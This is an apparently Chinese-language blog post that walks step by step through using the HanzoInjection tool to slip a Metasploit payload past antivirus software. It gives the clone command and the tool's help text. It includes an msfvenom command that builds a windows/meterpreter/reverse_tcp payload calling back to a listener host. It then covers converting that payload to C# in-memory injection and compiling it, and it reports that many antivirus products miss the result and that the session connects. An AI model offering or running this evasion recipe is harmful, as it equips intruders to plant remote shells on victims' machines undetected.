欢迎光临
我们一直在努力

bypassAV_hanzoInjection

<

div>

下载hanzoInjection


git clone https://github.com/P0cL4bs/hanzoInjection.git

使用方式:


sage: HanzoInjection.exe [Options] [-h] [-e] [-o] [-p] [-b]  the HanzoIjection is a tool focused on injecting arbitrary codes in memory to bypass common antivirus solutions.   Developer: Mharcos Nesster (mh4x0f) Email:mh4root@gmail.com Site: www.chmodsecurity.com.br  Greetx:  P0cL4bs Team { N4sss , MMXM , Chrislley, MovCode, joridos }  -------------------------------------------------------------------   Arguments Options:          OPTION        TYPE       DESCRIPTION        -e,--execute  [.raw]      Name of file.bin, payload metasploit type raw        -p,--payload  [.raw]      Payload meterpreter type [RAW]  requered parameter -o [output]        -o,--output   [file.cs]   Output generate project file.cs injection memory payload c#        -b,--binder   [NULL]      Binder File  EXE  with encrypt file PE not requered paramenter        -h,--help     [Help]      show this help and exit  Example Usage:          HanzoInjection.exe -e payload_meterpreter.bin         HanzoInjection.exe -p meterpreter.bin -o injection_memory.cs         HanzoInjection.exe -b

 

生成paylaod


?  ~  msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.100 lport=4444 -f raw -o ~/Desktop/test.bin

检测:
bypassAV_hanzoInjection-4 bypassAV_hanzoInjection

使用hanzoInjection生成cs:


?  hanzoInjection [master] wine HanzoInjection.exe -p ~/Desktop/test.bin -o ~/Desktop/test.cs

之后使用vs编译cs:

bypassAV_hanzoInjection-4 bypassAV_hanzoInjection

如果出现错误,修改编译器允许不安全代码。

生成的文件检测结果:

bypassAV_hanzoInjection-4 bypassAV_hanzoInjection

虽然还有报毒,但是已经可以过很多杀软了。测试可以上线:

bypassAV_hanzoInjection-4 bypassAV_hanzoInjection

<

div style=”float:right”>

未经允许不得转载:杂术馆 » bypassAV_hanzoInjection
分享到: 更多 (0)